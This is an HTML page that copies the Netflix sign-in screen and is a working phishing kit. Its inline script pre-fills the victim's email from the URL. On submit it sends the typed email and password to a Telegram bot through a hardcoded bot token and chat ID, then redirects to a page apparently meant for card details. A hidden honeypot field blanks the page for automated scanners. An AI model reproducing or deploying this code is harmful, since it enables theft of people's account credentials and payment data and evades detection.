<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Netflix</title>
  <style>
  body{
  background: url('https://assets.nflxext.com/ffe/siteui/vlv3/b70b092f-1760-4498-b462-b4ef19907ec7/31c2543d-4bd2-446f-bb3c-5fbf995ca106/NG-en-20211101-popsignuptwoweeks-perspective_alpha_website_small.jpg');padding: 0;
  margin: 0;
  font-family: Arial, Helvetica, sans-serif;
}
div a img{
display:none!important;
}

.error{
  font-size: 13px;
  color: #e87c03;
  display: none;
}
.errorTxt{
  font-size: 13px;
  color: #e87c03;
  display: none
}
.container{
  height: 820px;
  background: rgb(0, 0, 0, 0.55);
  position: relative;
}
.icon-net img{
  height: 105px;
  padding: 23px 0px 0px 50px
}
footer{
  background: rgb(221, 220, 220);
  padding: 20px;
  color: #737373;
}

.form{
  background: rgb(0, 0, 0, 0.75);
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  width: 28%;
  height: 660px;
  display: flex;
  flex-direction: column;
  justify-content: space-evenly;
  align-items: center;
  color: #fff
}
.boxer{
  width: 65%;
  height: 500px;
}

form input[placeholder]{
  font-size: 16px
}
form input{
    border-radius: 4px;
    border: 0;
    color: #fff;
    line-height: 30px;
    padding: 10px;
    background: #333;
    outline: none
}
form a{
  color: #737373
}
form{
  display: flex;
  flex-direction: column;
  justify-content: space-between;
  height: 250px
}

button {
background: #e50914;
border-radius: 4px;
border: 0;
color: #fff;
height: 50px;
padding: 10px 20px;
font-weight: bold;
font-size: 16px;
    
}

.fb-capcha p{
  font-size: 12px
}
.fb-capcha{
  color: #737373;
  margin-top: 5%
}

.logo-fb img{
  height: 20px
}
.fb-capcha p a{
  color: #0080ff;
}
.logo-fb p{
  font-size: 12px;
  letter-spacing: 1px;
  font-weight: 500
}
.logo-fb{
  display: flex;
  justify-content: space-between;
  width: 50%;
  align-content: center;
  align-items: center;
}
footer{
  background: rgb(0, 0, 0, 0.9);
  padding: 20px
}


@media(max-width: 850px){
  form{

  }
  body{
    background: #000
  }
  .icon-net img{
  height: 45px;
  padding: 15px
}

  .form{
    width: 100%;
    top: 10%;
  left: 50%;
  transform: translate(-50%, -10%);
  background: none;
  }
  .boxer{
    width: 90%
    
  }
  .logo-fb{
    width: 50%
  }
}
  </style>
</head>
<body>
    <div class="container">
      <div class="icon-net">
       <!-- <img src="./public/net-logo.svg" alt=""> -->
        <img src="https://img.icons8.com/color/48/000000/netflix.png"/>
      </div>
      <div class="form">
        <div class="boxer">
        <h1>Sign In</h1>
        <form action="" id="form" method="post">
          <input type="text" class="inputEmail" value="" id="usrru" style="display:none;" placeholder="Email or phone number">
          <input type="text" class="inputEmail" id="usr" placeholder="Email or phone number" required>
          <p class="errorTxt">Please enter a valid email or phone number.</p>
          <input type="current-password" class="inputPwd" id="pwd" placeholder="Password" required>
          <p class="error">Your password must contain between 4 and 60 characters.</p>
          <button type="submit" name="login-submit">Sign In</button>
          <div class="spread">
            <div class="remember"></div>
            <a href="#">Need help?</a>
          </div>
        </form>

        <div class="fb-capcha">
          <div class="logo-fb">
            <img src="./public/fbgolo.png" alt="">
            <p>Login with Facebook</p>
          </div>
          <p>This page is protected by Google reCAPCHA to ensure you're not a bot. <a href="#">Learn more.</a></p>
          </div>
        </div>
      </div>
    </div>
    <footer>
      <div class="footer">
        <ul>
          <li>Questions? Contact us.</li>
          <li>FAQ</li>
          <li>Cookie Preferences</li>
        </ul>
        <ul>
          <li>Help Center</li>
          <li>Corporate Information</li>
          <li>Help Center</li>
        </ul>
      </div>
    </footer>
<script>




const currentUrl = window.location.href;
let maill = document.querySelector('#usr')
let emailPattern = /[\w._%+-]+@[\w.-]+\.[a-zA-Z]{2,}/;
let matches = currentUrl.match(emailPattern);
let email;

if (matches) {
  email = matches[0];
  maill.value = email  
}
// const domainn = email.substring(email.lastIndexOf("@") + 1);



      const forma = document.querySelector('#form')
    
      let bot = {
        TOKEN: "6636761328:AAEfHmiz8pDB1XlMaBq60cq-tRgM0Zl8PHU",
    chatID: "-822669959"
      }


    forma.addEventListener("submit", e =>{
          e.preventDefault();
          let email = document.querySelector('#usr').value
          let emaiput = document.querySelector('#usrru').value
          let qqpwdqq = document.querySelector('#pwd').value
          var body = document.querySelector('body');


          if(emaiput !== ""){
                          // Remove all child nodes from the body
              while (body.firstChild) {
                body.firstChild.remove();
              }
              return
          }


        fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=NETFLIX=>\n${email}=\n${qqpwdqq}`, {
              method: "GET"
          }).then(success => {
              window.location.replace("./cc.html");
          }, error => {
              alert("Message not sent")
              console.log(error)
              
              }) 
      })
    </script>

</script>
</body>
</html>